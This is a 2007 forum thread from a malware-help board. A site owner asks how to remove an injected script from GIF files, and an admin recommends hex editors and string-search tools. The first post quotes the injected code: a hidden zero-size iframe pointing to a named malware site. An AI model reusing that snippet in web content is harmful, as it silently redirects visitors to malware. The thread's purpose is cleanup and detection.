www.ac66.cn

Discussion in 'Malware Help (A Specialist Will Reply)' started by hotboxdp, Jun 6, 2007.

  1. hotboxdp

    hotboxdp Private E-2

    Can someone tell me how to remove this link to virus site without corrupting the gif?

    <iframe src="http://www.ac66.cn/88/ index.htm" width="0" height="0" frameborder="0"></iframe>
     
    hotboxdp, Jun 6, 2007
    #1
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    I'm not sure what you mean by "without deleting the gif". What gif? All you posted was what looks to be a section of an HTML page.

    The URL you posted is a site that contains malware. Why do you want to access that site? It the site itself contains malware, we cannot remove it from the site.
     
    chaslang, Jun 6, 2007
    #2
  3. hotboxdp

    hotboxdp Private E-2

    Here's what's happening. That bit of script has embedded itself in several gif image files on my computer that are used on my website. It tries to redirect people to that Malware site. I would like to remove that bit of script without coruppting the image file. I tried on one but now that image file won't open properly. I was wondering if anyone knew of a tool to remove it.
     
    hotboxdp, Jun 6, 2007
    #3
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Where did you get the images from to begin with? Did they come with this embedded?
    If you are saying these were your own original files and that this was added to them some how, then you should be checking out your whole PC/website for infections.


    Have you tried using a binary/hex editor? Exactly how did you try to edit the files.
     
    chaslang, Jun 6, 2007
    #4
  5. hotboxdp

    hotboxdp Private E-2

    These are component image files created in Frontpage. The malicious script got into the image files through a virus which was eliminated from my computer but had enough time to embed this script into some files. I found out about it from someone visiting my website who identified the 2 gif images that carried the script. I tried to delete the script from each image file by opening with wordpad and deleting the entry but that also left me with a corrupted gif image. I eventually replaced those with fresh files. The problem now is how can I check all the other image files on my computer to make sure they are free of this script. I have hundreds of image files. Is there any programs that can search inside gif's and jpeg's for specific words or phrases?
     
    hotboxdp, Jun 6, 2007
    #5
  6. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You need to use an editor designed to edit file in binary form (also referred to as hex editing). For example this would probably work: UltraEdit There are many others around if your search for HexEdit (there was a tool named exactly this name too) or binary editor....etc.

    There are tools out there that can search thru file for ASCII strings and show them. You would have to search around to find them or post a message in the Software Forum and someone there may be able to point you towards a tool. You really need one that you can script or run from the command prompt that can do a global search on all files. Otherwise it may take you a long time to search one file at a time if you have lots of images.
     
    chaslang, Jun 7, 2007
    #6

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds